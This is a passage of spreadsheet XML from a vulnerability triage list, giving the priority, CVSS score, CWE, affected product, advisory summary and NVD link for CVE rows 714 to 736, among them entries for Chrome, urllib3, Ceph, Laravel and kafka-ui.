          <t>OpenMAIC before 1.0.1 skips server-side request forgery validation in non-production builds, allowing unauthenticated attackers to reach cloud instance metadata services. Attackers can supply arbitrary provider URLs via the x-base-url header or baseUrl parameter to access sensitive cloud credentials and metadata.</t>
        </is>
      </c>
      <c r="M714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86259</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87613</t>
        </is>
      </c>
      <c r="C715" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D715" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I715" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="L715" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87613</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87911</t>
        </is>
      </c>
      <c r="C716" s="5" t="n">
        <v>9</v>
      </c>
      <c r="D716" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G716" s="5" t="inlineStr">
        <is>
          <t>postgresql, aws</t>
        </is>
      </c>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-78</t>
        </is>
      </c>
      <c r="L716"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M716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87911</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-30156</t>
        </is>
      </c>
      <c r="C717" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G717" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr">
        <is>
          <t>CWE-327</t>
        </is>
      </c>
      <c r="L717" s="5" t="inlineStr">
        <is>
          <t>Ceph is an open-source distributed storage platform providing object, block, and file storage. In versions prior to 20.2.4 and 19.2.6, the CephX authentication protocol encrypts tickets with AES-128-CBC in an unauthenticated mode that uses a hard-coded initialization vector and no message authentication, allowing an attacker to forge credentials and gain cluster-wide access. Because the ciphertext is malleable and the monitor will encrypt attacker-chosen entity names, an attacker holding one low-privilege key and able to observe CephX traffic can use the monitor as an encryption oracle and splice ciphertext blocks into valid tickets for privileged entities such as Manager, MDS, and OSD. The same lack of authentication also lets an attacker with CephX permissions escalate privileges by flipping a single bit in a service ticket to set its allow_all field to true. This issue is fixed in versions 20.2.4 and 19.2.6.</t>
        </is>
      </c>
      <c r="M717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-30156</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21441</t>
        </is>
      </c>
      <c r="C718" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="n">
        <v>0.03</v>
      </c>
      <c r="G718" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H718" s="5" t="inlineStr">
        <is>
          <t>python:urllib3</t>
        </is>
      </c>
      <c r="I718" s="5" t="inlineStr">
        <is>
          <t>2026-01-07</t>
        </is>
      </c>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr">
        <is>
          <t>urllib3 is an HTTP client library for Python. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. Starting in version 1.22 and prior to version 2.6.3, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client. Applications and libraries are affected when they stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. Users should upgrade to at least urllib3 v2.6.3, in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable redirects by setting `redirect=False` for requests to untrusted source.</t>
        </is>
      </c>
      <c r="M718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21441</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30864</t>
        </is>
      </c>
      <c r="C719" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L719" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to Reflected Cross-Site Scripting (XSS) in the dashboard revert functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30864</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44432</t>
        </is>
      </c>
      <c r="C720" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G720" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H720" s="5" t="inlineStr">
        <is>
          <t>python:urllib3</t>
        </is>
      </c>
      <c r="I720" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L720" s="5" t="inlineStr">
        <is>
          <t>urllib3 is an HTTP client library for Python. From 2.6.0 to before 2.7.0, urllib3 could decompress the whole response instead of the requested portion (1) during the second HTTPResponse.read(amt=N) call when the response was decompressed using the official Brotli library or (2) when HTTPResponse.drain_conn() was called after the response had been read and decompressed partially (compression algorithm did not matter here). These issues could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This could result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data) on the client side. This vulnerability is fixed in 2.7.0.</t>
        </is>
      </c>
      <c r="M720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44432</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47746</t>
        </is>
      </c>
      <c r="C721" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L721" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. Versions 12.37.0 and later, but prior to 2026.5.4, are vulnerable to timing attacks during JSON-LD signature validation and the compaction process. Because the JSON-LD parsing context is not shared between signature verification and subsequent processing, the application may trust information that should not be trusted, resulting in a time-of-check to time-of-use (TOCTOU) flaw. This allows an attacker to have fraudulent activities accepted as valid, leading to a loss of integrity. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47746</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48019</t>
        </is>
      </c>
      <c r="C722" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L722" s="5" t="inlineStr">
        <is>
          <t>Laravel is a web application framework. Prior to versions 12.60.0 and 13.10.0, a CRLF injection vulnerability in Laravel's email validation, in combination with how Symfony Mailer and Symfony Mime handle certain character sequences, may allow an unauthenticated attacker to interfere with outbound email processing in applications that send mail to user-supplied addresses. This issue has been patched in versions 12.60.0 and 13.10.0.</t>
        </is>
      </c>
      <c r="M722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48019</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50093</t>
        </is>
      </c>
      <c r="C723" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L723" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Siveillance Control Pro V3.0 (All versions &lt; V3.0.12.2173), Siveillance Control Pro V4.0 (All versions &lt; V4.0.9.2178), Siveillance Control V3.0 (All versions &lt; V3.0.22.2177), Siveillance Control V4.0 (All versions &lt; V4.0.11.2177). A vulnerability in the OIS web module allows an attacker to upload arbitrary files to the server. Successful exploitation of this vulnerability could allow an attacker to gain root access on the host system, potentially leading to a full compromise of the affected OIS environment.</t>
        </is>
      </c>
      <c r="M723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50093</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5598</t>
        </is>
      </c>
      <c r="C724" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G724" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr">
        <is>
          <t>2026-04-15</t>
        </is>
      </c>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr">
        <is>
          <t>CWE-385</t>
        </is>
      </c>
      <c r="L724" s="5" t="inlineStr">
        <is>
          <t>Covert timing channel vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA core on all (core modules).
 This vulnerability is associated with program files FrodoEngine.Java.
This issue affects BC-JAVA: from 1.71 before 1.80.2, from 1.81 before 1.81.1, from 1.82 before 1.84.</t>
        </is>
      </c>
      <c r="M724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5598</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5706</t>
        </is>
      </c>
      <c r="C725" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="L725" s="5" t="inlineStr">
        <is>
          <t>In Bluetooth Mesh SDK 6.1.4 and earlier, malformed extended advertisements can trigger out-of-bounds writes leading to stack corruption and remote code execution. These messages must come from a device that has already joined the network. Only provisioners supporting extended advertisements may be impacted.</t>
        </is>
      </c>
      <c r="M725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5706</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61666</t>
        </is>
      </c>
      <c r="C726" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L726" s="5" t="inlineStr">
        <is>
          <t>websocket-driver is a WebSocket protocol handler with pluggable I/O. Prior to 0.8.2, WebSocket::Driver.server() passes a malformed Host header to URI.parse in lib/websocket/http/request.rb without catching URI::InvalidURIError, allowing a remote client to crash a TCP-backed WebSocket server when the application does not catch the error from parse(). This issue is fixed in version 0.8.2.</t>
        </is>
      </c>
      <c r="M726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61666</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72772</t>
        </is>
      </c>
      <c r="C727" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="L727" s="5" t="inlineStr">
        <is>
          <t>n8n before 2.32.1 (and before 2.31.5) is vulnerable to account takeover via the Token Exchange Embed Login feature. When a validly-signed incoming token was matched to a local account by its email claim, the service did not verify that the email claim was verified, nor that the trusted key's permitted role ceiling covered that account. As a result, anyone able to obtain a token accepted by a configured trusted key (for example, a trusted issuer emitting unverified email addresses) could authenticate as any existing user and gain full account control. This issue only affects instances where the embed login feature is enabled and at least one trusted key source is configured.</t>
        </is>
      </c>
      <c r="M727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72772</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79921</t>
        </is>
      </c>
      <c r="C728" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L728" s="5" t="inlineStr">
        <is>
          <t>amqp091-go is a Go AMQP 0.9.1 client. Before version 1.13.0, a compromised or malicious AMQP broker can force the client to allocate resources for and process content body frames that exceed the negotiated frame_max limit. This can lead to unexpected memory consumption or application-layer denial of service (DoS), bypassing the protocol's built-in framing constraints. Version 1.13.0 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79921</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82866</t>
        </is>
      </c>
      <c r="C729" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L729" s="5" t="inlineStr">
        <is>
          <t>@pdfme/common before 5.5.10 contains a server-side request forgery vulnerability in the getB64BasePdf function that fetches arbitrary URLs without validation when basePdf is attacker-controlled. Attackers who control the basePdf template field can force servers or clients to make requests to internal endpoints, enabling metadata exfiltration, network reconnaissance, and blind request forgery attacks.</t>
        </is>
      </c>
      <c r="M729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82866</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86165</t>
        </is>
      </c>
      <c r="C730" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="D730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-120</t>
        </is>
      </c>
      <c r="L730" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Tenda HG10 300001138. This vulnerability affects the function formURL of the file /boaform/admin/formURL. Performing a manipulation of the argument Keywd/urlFQDN results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="M730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86165</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-52251</t>
        </is>
      </c>
      <c r="C731" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="n">
        <v>0.868</v>
      </c>
      <c r="G731" s="5" t="inlineStr">
        <is>
          <t>kafka</t>
        </is>
      </c>
      <c r="H731" s="5" t="inlineStr">
        <is>
          <t>provectus:ui</t>
        </is>
      </c>
      <c r="I731" s="5" t="inlineStr">
        <is>
          <t>2024-01-25</t>
        </is>
      </c>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L731" s="5" t="inlineStr">
        <is>
          <t>An issue discovered in provectus kafka-ui 0.4.0 through 0.7.2 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages. No fixed release is available; the project has had no commit since 2024-04-08.</t>
        </is>
      </c>
      <c r="M731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-52251</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-20701</t>
        </is>
      </c>
      <c r="C732" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="n">
        <v>0.078</v>
      </c>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr">
        <is>
          <t>2025-08-04</t>
        </is>
      </c>
      <c r="J732" s="5" t="inlineStr"/>
      <c r="K732" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L732" s="5" t="inlineStr">
        <is>
          <t>In the Airoha Bluetooth audio SDK, there is a possible way to pair Bluetooth audio device without user consent. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-20701</t>
        </is>
      </c>
    </row>
    <row r="733">
      <c r="A733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B733" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56798</t>
        </is>
      </c>
      <c r="C733" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E733" s="5" t="inlineStr"/>
      <c r="F733" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G733" s="5" t="inlineStr"/>
      <c r="H733" s="5" t="inlineStr"/>
      <c r="I733" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J733" s="5" t="inlineStr"/>
      <c r="K733" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L733" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Lime Technology, Inc.'s Unraid OS version 6.12.14 and earlier allows remote attackers to escalate privileges via the Unraid authentication cookie's lax same-site policy.</t>
        </is>
      </c>
      <c r="M733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56798</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-67030</t>
        </is>
      </c>
      <c r="C734" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr">
        <is>
          <t>codehaus-plexus:plexus-utils</t>
        </is>
      </c>
      <c r="I734" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J734" s="5" t="inlineStr"/>
      <c r="K734" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L734" s="5" t="inlineStr">
        <is>
          <t>Directory Traversal vulnerability in the extractFile method of org.codehaus.plexus.util.Expand in plexus-utils before 6d780b3378829318ba5c2d29547e0012d5b29642. This allows an attacker to execute arbitrary code</t>
        </is>
      </c>
      <c r="M734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-67030</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70151</t>
        </is>
      </c>
      <c r="C735" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr">
        <is>
          <t>fabian:scholars_tracking_system</t>
        </is>
      </c>
      <c r="I735" s="5" t="inlineStr">
        <is>
          <t>2026-02-18</t>
        </is>
      </c>
      <c r="J735" s="5" t="inlineStr"/>
      <c r="K735" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>code-proje</t>
        </is>
      </c>
      <c r="M735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70151</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-9049</t>
        </is>
      </c>
      <c r="C736" s="5" t="n">
